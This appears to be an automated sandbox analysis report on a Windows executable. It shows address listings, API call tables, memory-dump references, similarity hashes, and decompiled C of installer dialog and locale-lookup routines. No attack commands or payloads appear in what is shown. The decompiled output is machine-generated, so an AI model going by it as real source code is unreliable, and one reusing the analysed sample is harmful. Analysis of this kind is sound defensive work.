                                                                            0x00000000
                                                                            0x004051f0
                                                                            0x004051d2
                                                                            0x004051d9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405293
                                                                            0x00405293
                                                                            0x0040529a
                                                                            0x0040530b
                                                                            0x00405313
                                                                            0x0040531b
                                                                            0x0040531b
                                                                            0x00405324
                                                                            0x00405326
                                                                            0x0040532d
                                                                            0x00405330
                                                                            0x00405330
                                                                            0x00405336
                                                                            0x0040533d
                                                                            0x00405340
                                                                            0x00405340
                                                                            0x00405346
                                                                            0x0040534c
                                                                            0x00405352
                                                                            0x00405352
                                                                            0x0040535f
                                                                            0x004054c0
                                                                            0x004054c7
                                                                            0x004054e4
                                                                            0x004054ea
                                                                            0x004054fc
                                                                            0x004054fc
                                                                            0x00000000
                                                                            0x00405365
                                                                            0x00405367
                                                                            0x0040536c
                                                                            0x00405371
                                                                            0x00405376
                                                                            0x00405378
                                                                            0x00405378
                                                                            0x00405379
                                                                            0x0040537a
                                                                            0x0040537c
                                                                            0x0040537c
                                                                            0x00405384
                                                                            0x004053c5
                                                                            0x004053c7
                                                                            0x004053d7
                                                                            0x004053da
                                                                            0x004053df
                                                                            0x004053e6
                                                                            0x004053e9
                                                                            0x0040548b
                                                                            0x00405494
                                                                            0x0040549c
                                                                            0x0040549c
                                                                            0x004054aa
                                                                            0x004054bb
                                                                            0x004054bb
                                                                            0x00000000
                                                                            0x004054aa
                                                                            0x004053ef
                                                                            0x004053f2
                                                                            0x004053f8
                                                                            0x004053fd
                                                                            0x004053ff
                                                                            0x00405401
                                                                            0x00405407
                                                                            0x0040540e
                                                                            0x00405413
                                                                            0x0040541a
                                                                            0x0040541d
                                                                            0x0040541d
                                                                            0x00405424
                                                                            0x00405430
                                                                            0x00405434
                                                                            0x00405436
                                                                            0x00405436
                                                                            0x00405426
                                                                            0x00405428
                                                                            0x00405428
                                                                            0x00405456
                                                                            0x00405462
                                                                            0x00405471
                                                                            0x00405471
                                                                            0x00405473
                                                                            0x00405476
                                                                            0x0040547f
                                                                            0x00000000
                                                                            0x00405386
                                                                            0x00405391
                                                                            0x00405394
                                                                            0x00405399
                                                                            0x0040539b
                                                                            0x0040539f
                                                                            0x004053af
                                                                            0x004053b9
                                                                            0x004053bb
                                                                            0x004053be
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004053a1
                                                                            0x004053a1
                                                                            0x004053a7
                                                                            0x004053a9
                                                                            0x004053a9
                                                                            0x004053aa
                                                                            0x004053ab
                                                                            0x00000000
                                                                            0x004053a1
                                                                            0x00405384
                                                                            0x0040535f
                                                                            0x004052a2
                                                                            0x00000000
                                                                            0x004052b8
                                                                            0x004052c2
                                                                            0x004052c7
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004052d9
                                                                            0x004052de
                                                                            0x004052ea
                                                                            0x004052ea
                                                                            0x004052ec
                                                                            0x004052fb
                                                                            0x004052fd
                                                                            0x00405301
                                                                            0x00405304
                                                                            0x00000000
                                                                            0x00405304
                                                                            0x004052a2
                                                                            0x00404f58
                                                                            0x00404f5d
                                                                            0x00404f66
                                                                            0x00404f6d
                                                                            0x00404f7f
                                                                            0x00404f8a
                                                                            0x00404f90
                                                                            0x00404f9e
                                                                            0x00404fb2
                                                                            0x00404fb7
                                                                            0x00404fc4
                                                                            0x00404fc9
                                                                            0x00404fdf
                                                                            0x00404ff0
                                                                            0x00404ffd
                                                                            0x00404ffd
                                                                            0x00405000
                                                                            0x00405006
                                                                            0x00405008
                                                                            0x0040500b
                                                                            0x00405010
                                                                            0x00405015
                                                                            0x00405017
                                                                            0x00405017
                                                                            0x00405037
                                                                            0x00405037
                                                                            0x00405039
                                                                            0x0040503a
                                                                            0x0040503f
                                                                            0x00405045
                                                                            0x00405049
                                                                            0x0040504e
                                                                            0x00405056
                                                                            0x0040505a
                                                                            0x0040505f
                                                                            0x00405064
                                                                            0x0040506c
                                                                            0x0040506f
                                                                            0x0040513f
                                                                            0x00405152
                                                                            0x00000000
                                                                            0x00405075
                                                                            0x00405078
                                                                            0x0040507b
                                                                            0x0040507e
                                                                            0x0040507e
                                                                            0x00405084
                                                                            0x0040508d
                                                                            0x00405090
                                                                            0x00405094
                                                                            0x00405097
                                                                            0x0040509a
                                                                            0x004050a3
                                                                            0x004050ac
                                                                            0x004050af
                                                                            0x004050b2
                                                                            0x004050b5
                                                                            0x004050f3
                                                                            0x0040511e
                                                                            0x004050f5
                                                                            0x00405104
                                                                            0x00405104
                                                                            0x004050b7
                                                                            0x004050ba
                                                                            0x004050c8
                                                                            0x004050d2
                                                                            0x004050da
                                                                            0x004050e1
                                                                            0x004050ec
                                                                            0x004050ec
                                                                            0x004050b5
                                                                            0x00405124
                                                                            0x00405125
                                                                            0x00405131
                                                                            0x00405131
                                                                            0x0040513d
                                                                            0x00405158
                                                                            0x0040515b
                                                                            0x00405178
                                                                            0x00000000
                                                                            0x0040515d
                                                                            0x00405162
                                                                            0x0040516b
                                                                            0x004054fe
                                                                            0x00405510
                                                                            0x00405510
                                                                            0x0040515b
                                                                            0x00000000
                                                                            0x0040513d
                                                                            0x0040506f

                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003F9), ref: 00404F1E
                                                                            • GetDlgItem.USER32(?,00000408), ref: 00404F29
                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F73
                                                                            • LoadImageW.USER32 ref: 00404F8A
                                                                            • SetWindowLongW.USER32 ref: 00404FA3
                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB7
                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FC9
                                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404FDF
                                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FEB
                                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFD
                                                                            • DeleteObject.GDI32(00000000), ref: 00405000
                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102
                                                                              • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00405144
                                                                            • SetWindowLongW.USER32 ref: 00405152
                                                                            • ShowWindow.USER32(?,00000005), ref: 00405162
                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040525D
                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C2
                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052D7
                                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FB
                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040531B
                                                                            • ImageList_Destroy.COMCTL32(?), ref: 00405330
                                                                            • GlobalFree.KERNEL32(?), ref: 00405340
                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053B9
                                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 00405462
                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405471
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0040549C
                                                                            • ShowWindow.USER32(?,00000000), ref: 004054EA
                                                                            • GetDlgItem.USER32(?,000003FE), ref: 004054F5
                                                                            • ShowWindow.USER32(00000000), ref: 004054FC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                            • String ID: $M$N
                                                                            • API String ID: 2564846305-813528018
                                                                            • Opcode ID: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
                                                                            • Instruction ID: 669472b6e39b4296dbb294a81ed98d86f32f22d8abeb4cff7518c6a892085abf
                                                                            • Opcode Fuzzy Hash: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
                                                                            • Instruction Fuzzy Hash: EF028A70900608EFDB20DFA9DD45AAF7BB5FB84314F10817AE610BA2E0D7799942DF58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00403F9A, Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 84%
                                                                            			E00403F9A(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t48;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t117;
				int _t118;
				int _t122;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				intOrPtr _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;

				_t130 = _a8;
				if(_t130 == 0x110 || _t130 == 0x408) {
					_t34 = _a12;
					_t127 = _a4;
					__eflags = _t130 - 0x110;
					 *0x42d250 = _t34;
					if(_t130 == 0x110) {
						 *0x434f08 = _t127;
						 *0x42d264 = GetDlgItem(_t127, 1);
						_t91 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x42b230 = _t91;
						E00404499(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x433ee8);
						 *0x433ecc = E0040140B(4);
						_t34 = 1;
						__eflags = 1;
						 *0x42d250 = 1;
					}
					_t124 =  *0x40a368; // 0xffffffff
					_t136 = 0;
					_t133 = (_t124 << 6) +  *0x434f20;
					__eflags = _t124;
					if(_t124 < 0) {
						L36:
						E004044E5(0x40b);
						while(1) {
							_t36 =  *0x42d250;
							 *0x40a368 =  *0x40a368 + _t36;
							_t133 = _t133 + (_t36 << 6);
							_t38 =  *0x40a368; // 0xffffffff
							__eflags = _t38 -  *0x434f24;
							if(_t38 ==  *0x434f24) {
								E0040140B(1);
							}
							__eflags =  *0x433ecc - _t136;
							if( *0x433ecc != _t136) {
								break;
							}
							__eflags =  *0x40a368 -  *0x434f24; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t133 + 0x14);
							E0040657A(_t117, _t127, _t133, 0x445000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E00404499(_t127);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E00404499(_t127);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E00404499(_t127);
							_t48 = GetDlgItem(_t127, 3);
							__eflags =  *0x434f8c - _t136;
							_v28 = _t48;
							if( *0x434f8c != _t136) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t48, _t117 & 0x00000008);
							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100);
							E004044BB(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x42b230, _t118);
							__eflags = _t118 - _t136;
							if(_t118 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
							__eflags =  *0x434f8c - _t136;
							if( *0x434f8c == _t136) {
								_push( *0x42d264);
							} else {
								SendMessageW(_t127, 0x401, 2, _t136);
								_push( *0x42b230);
							}
							E004044CE();
							E0040653D(0x42d268, E00403F7B());
							E0040657A(0x42d268, _t127, _t133,  &(0x42d268[lstrlenW(0x42d268)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t127, 0x42d268);
							_push(_t136);
							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x433ed8);
									 *0x42c240 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L60;
									}
									_t73 = CreateDialogParamW( *0x434f00,  *_t133 +  *0x433ee0 & 0x0000ffff, _t127,  *(0x40a36c +  *(_t133 + 4) * 4), _t133);
									__eflags = _t73 - _t136;
									 *0x433ed8 = _t73;
									if(_t73 == _t136) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E00404499(_t73);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t127, _t137 + 0x10);
									SetWindowPos( *0x433ed8, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E00401389( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x433ecc - _t136;
									if( *0x433ecc != _t136) {
										goto L63;
									}
									ShowWindow( *0x433ed8, 8);
									E004044E5(0x405);
									goto L60;
								}
								__eflags =  *0x434f8c - _t136;
								if( *0x434f8c != _t136) {
									goto L63;
								}
								__eflags =  *0x434f80 - _t136;
								if( *0x434f80 != _t136) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x433ed8);
						 *0x434f08 = _t136;
						EndDialog(_t127,  *0x42ba38);
						goto L60;
					} else {
						__eflags = _t34 - 1;
						if(_t34 != 1) {
							L35:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L63;
							}
							goto L36;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L35;
						}
						SendMessageW( *0x433ed8, 0x40f, 0, 1);
						__eflags =  *0x433ecc;
						return 0 |  *0x433ecc == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t136 = 0;
					if(_t130 == 0x47) {
						SetWindowPos( *0x42d248, _t127, 0, 0, 0, 0, 0x13);
					}
					_t122 = _a12;
					if(_t130 != 5) {
						L8:
						if(_t130 != 0x40d) {
							__eflags = _t130 - 0x11;
							if(_t130 != 0x11) {
								__eflags = _t130 - 0x111;
								if(_t130 != 0x111) {
									goto L28;
								}
								_t135 = _t122 & 0x0000ffff;
								_t128 = GetDlgItem(_t127, _t135);
								__eflags = _t128 - _t136;
								if(_t128 == _t136) {
									L15:
									__eflags = _t135 - 1;
									if(_t135 != 1) {
										__eflags = _t135 - 3;
										if(_t135 != 3) {
											_t129 = 2;
											__eflags = _t135 - _t129;
											if(_t135 != _t129) {
												L27:
												SendMessageW( *0x433ed8, 0x111, _t122, _a16);
												goto L28;
											}
											__eflags =  *0x434f8c - _t136;
											if( *0x434f8c == _t136) {
												_t99 = E0040140B(3);
												__eflags = _t99;
												if(_t99 != 0) {
													goto L28;
												}
												 *0x42ba38 = 1;
												L23:
												_push(0x78);
												L24:
												E00404472();
												goto L28;
											}
											E0040140B(_t129);
											 *0x42ba38 = _t129;
											goto L23;
										}
										__eflags =  *0x40a368 - _t136; // 0xffffffff
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t135);
									goto L24;
								}
								SendMessageW(_t128, 0xf3, _t136, _t136);
								_t103 = IsWindowEnabled(_t128);
								__eflags = _t103;
								if(_t103 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongW(_t127, _t136, _t136);
							return 1;
						}
						DestroyWindow( *0x433ed8);
						 *0x433ed8 = _t122;
						L60:
						if( *0x42f268 == _t136 &&  *0x433ed8 != _t136) {
							ShowWindow(_t127, 0xa);
							 *0x42f268 = 1;
						}
						goto L63;
					} else {
						asm("sbb eax, eax");
						ShowWindow( *0x42d248,  ~(_t122 - 1) & 0x00000005);
						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
							L28:
							return E00404500(_a8, _t122, _a16);
						} else {
							ShowWindow(_t127, 4);
							goto L8;
						}
					}
				}
			}































                                                                            0x00403fa5
                                                                            0x00403fac
                                                                            0x00404113
                                                                            0x00404117
                                                                            0x0040411b
                                                                            0x0040411d
                                                                            0x00404122
                                                                            0x0040412d
                                                                            0x00404138
                                                                            0x0040413d
                                                                            0x0040413f
                                                                            0x00404141
                                                                            0x00404144
                                                                            0x00404149
                                                                            0x00404157
                                                                            0x00404164
                                                                            0x0040416b
                                                                            0x0040416b
                                                                            0x0040416c
                                                                            0x0040416c
                                                                            0x00404171
                                                                            0x00404177
                                                                            0x0040417e
                                                                            0x00404184
                                                                            0x00404186
                                                                            0x004041c6
                                                                            0x004041cb
                                                                            0x004041d0
                                                                            0x004041d0
                                                                            0x004041d5
                                                                            0x004041de
                                                                            0x004041e0
                                                                            0x004041e5
                                                                            0x004041eb
                                                                            0x004041ef
                                                                            0x004041ef
                                                                            0x004041f4
                                                                            0x004041fa
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00404205
                                                                            0x0040420b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00404214
                                                                            0x0040421c
                                                                            0x00404221
                                                                            0x00404224
                                                                            0x0040422a
                                                                            0x0040422f
                                                                            0x00404232
                                                                            0x00404238
                                                                            0x0040423d
                                                                            0x00404240
                                                                            0x00404246
                                                                            0x0040424e
                                                                            0x00404254
                                                                            0x0040425a
                                                                            0x0040425e
                                                                            0x00404265
                                                                            0x00404265
                                                                            0x00404265
                                                                            0x0040426f
                                                                            0x00404281
                                                                            0x0040428d
                                                                            0x00404292
                                                                            0x0040429c
                                                                            0x004042a2
                                                                            0x004042a4
                                                                            0x004042a9
                                                                            0x004042a6
                                                                            0x004042a6
                                                                            0x004042a6
                                                                            0x004042b9
                                                                            0x004042d1
                                                                            0x004042d3
                                                                            0x004042d9
                                                                            0x004042ee
                                                                            0x004042db
                                                                            0x004042e4
                                                                            0x004042e6
                                                                            0x004042e6
                                                                            0x004042f4
                                                                            0x00404305
                                                                            0x0040431b
                                                                            0x00404322
                                                                            0x00404328
                                                                            0x0040432c
                                                                            0x00404331
                                                                            0x00404333
                                                                            0x00000000
                                                                            0x00404339
                                                                            0x00404339
                                                                            0x0040433b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00404341
                                                                            0x00404345
                                                                            0x0040436a
                                                                            0x00404370
                                                                            0x00404376
                                                                            0x00404378
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040439e
                                                                            0x004043a4
                                                                            0x004043a6
                                                                            0x004043ab
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004043b1
                                                                            0x004043b4
                                                                            0x004043b7
                                                                            0x004043ce
                                                                            0x004043da
                                                                            0x004043f3
                                                                            0x004043f9
                                                                            0x004043fd
                                                                            0x00404402
                                                                            0x00404408
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00404412
                                                                            0x0040441d
                                                                            0x00000000
                                                                            0x0040441d
                                                                            0x00404347
                                                                            0x0040434d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00404353
                                                                            0x00404359
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040435f
                                                                            0x00404333
                                                                            0x0040442a
                                                                            0x00404436
                                                                            0x0040443d
                                                                            0x00000000
                                                                            0x00404188
                                                                            0x00404188
                                                                            0x0040418b
                                                                            0x004041be
                                                                            0x004041be
                                                                            0x004041c0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004041c0
                                                                            0x0040418d
                                                                            0x00404191
                                                                            0x00404196
                                                                            0x00404198
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004041a8
                                                                            0x004041b0
                                                                            0x00000000
                                                                            0x004041b6
                                                                            0x00403fbe
                                                                            0x00403fbe
                                                                            0x00403fc2
                                                                            0x00403fc7
                                                                            0x00403fd6
                                                                            0x00403fd6
                                                                            0x00403fdc
                                                                            0x00403fe3
                                                                            0x00404027
                                                                            0x0040402d
                                                                            0x00404046
                                                                            0x00404049
                                                                            0x0040405c
                                                                            0x00404062
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00404068
                                                                            0x00404073
                                                                            0x00404075
                                                                            0x00404077
                                                                            0x00404096
                                                                            0x00404096
                                                                            0x00404099
                                                                            0x0040409e
                                                                            0x004040a1
                                                                            0x004040b1
                                                                            0x004040b2
                                                                            0x004040b4
                                                                            0x004040ea
                                                                            0x004040fa
                                                                            0x00000000
                                                                            0x004040fa
                                                                            0x004040b6
                                                                            0x004040bc
                                                                            0x004040d5
                                                                            0x004040da
                                                                            0x004040dc
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004040de
                                                                            0x004040ca
                                                                            0x004040ca
                                                                            0x004040cc
                                                                            0x004040cc
                                                                            0x00000000
                                                                            0x004040cc
                                                                            0x004040bf
                                                                            0x004040c4
                                                                            0x00000000
                                                                            0x004040c4
                                                                            0x004040a3
                                                                            0x004040a9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004040ab
                                                                            0x00000000
                                                                            0x004040ab
                                                                            0x0040409b
                                                                            0x00000000
                                                                            0x0040409b
                                                                            0x00404081
                                                                            0x00404088
                                                                            0x0040408e
                                                                            0x00404090
                                                                            0x00404466
                                                                            0x00000000
                                                                            0x00404466
                                                                            0x00000000
                                                                            0x00404090
                                                                            0x0040404e
                                                                            0x00000000
                                                                            0x00404056
                                                                            0x00404035
                                                                            0x0040403b
                                                                            0x00404443
                                                                            0x00404449
                                                                            0x00404456
                                                                            0x0040445c
                                                                            0x0040445c
                                                                            0x00000000
                                                                            0x00403fe5
                                                                            0x00403fea
                                                                            0x00403ff6
                                                                            0x00403fff
                                                                            0x00404100
                                                                            0x00000000
                                                                            0x0040401e
                                                                            0x00404021
                                                                            0x00000000
                                                                            0x00404021
                                                                            0x00403fff
                                                                            0x00403fe3

                                                                            APIs
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FD6
                                                                            • ShowWindow.USER32(?), ref: 00403FF6
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404008
                                                                            • ShowWindow.USER32(?,00000004), ref: 00404021
                                                                            • DestroyWindow.USER32 ref: 00404035
                                                                            • SetWindowLongW.USER32 ref: 0040404E
                                                                            • GetDlgItem.USER32(?,?), ref: 0040406D
                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404081
                                                                            • IsWindowEnabled.USER32(00000000), ref: 00404088
                                                                            • GetDlgItem.USER32(?,00000001), ref: 00404133
                                                                            • GetDlgItem.USER32(?,00000002), ref: 0040413D
                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 00404157
                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041A8
                                                                            • GetDlgItem.USER32(?,00000003), ref: 0040424E
                                                                            • ShowWindow.USER32(00000000,?), ref: 0040426F
                                                                            • EnableWindow.USER32(?,?), ref: 00404281
                                                                            • EnableWindow.USER32(?,?), ref: 0040429C
                                                                            • GetSystemMenu.USER32 ref: 004042B2
                                                                            • EnableMenuItem.USER32 ref: 004042B9
                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042D1
                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042E4
                                                                            • lstrlenW.KERNEL32(0042D268,?,0042D268,00000000), ref: 0040430E
                                                                            • SetWindowTextW.USER32 ref: 00404322
                                                                            • ShowWindow.USER32(?,0000000A), ref: 00404456
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
                                                                            • String ID:
                                                                            • API String ID: 1860320154-0
                                                                            • Opcode ID: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
                                                                            • Instruction ID: 19e8ffe36521fda3862950d2389d84f1ef0c133ac5ff71005f69e3a94542e2f3
                                                                            • Opcode Fuzzy Hash: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
                                                                            • Instruction Fuzzy Hash: DDC1A1B1A00704ABDB206F61EE49E2B3A68FB84746F15053EF741B61F1CB799841DB2D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00403BEC, Relevance: 42.2, APIs: 13, Strings: 11, Instructions: 215stringregistryCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 96%
                                                                            			E00403BEC(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x434f10;
				_t22 = E0040690A(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x42d268;
					L"1033" = 0x30;
					 *0x442002 = 0x78;
					 *0x442004 = 0;
					E0040640B(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x42d268, 0);
					__eflags =  *0x42d268;
					if(__eflags == 0) {
						E0040640B(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x42d268, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					E00406484(L"1033",  *_t22() & 0x0000ffff);
				}
				E00403EC2(_t78, _t90);
				 *0x434f80 =  *0x434f18 & 0x00000020;
				 *0x434f9c = 0x10000;
				if(E00405F14(_t90, 0x440800) != 0) {
					L16:
					if(E00405F14(_t98, 0x440800) == 0) {
						E0040657A(_t76, 0, _t82, 0x440800,  *((intOrPtr*)(_t82 + 0x118)));
					}
					_t30 = LoadImageW( *0x434f00, 0x67, 1, 0, 0, 0x8040);
					 *0x433ee8 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403EC2(_t78, __eflags);
							__eflags =  *0x434fa0;
							if( *0x434fa0 != 0) {
								_t33 = E00405672(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x433ecc;
								if( *0x433ecc == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x42d248, 5);
							_t39 = E0040689A("RichEd20");
							__eflags = _t39;
							if(_t39 == 0) {
								E0040689A("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x433ea0);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x433ea0);
								 *0x433ec4 = _t87;
								RegisterClassW(0x433ea0);
							}
							_t44 = DialogBoxParamW( *0x434f00,  *0x433ee0 + 0x00000069 & 0x0000ffff, 0, E00403F9A, 0);
							E00403B3C(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x434f00;
						 *0x433ea4 = E00401000;
						 *0x433eb0 =  *0x434f00;
						 *0x433eb4 = _t30;
						 *0x433ec4 = 0x40a380;
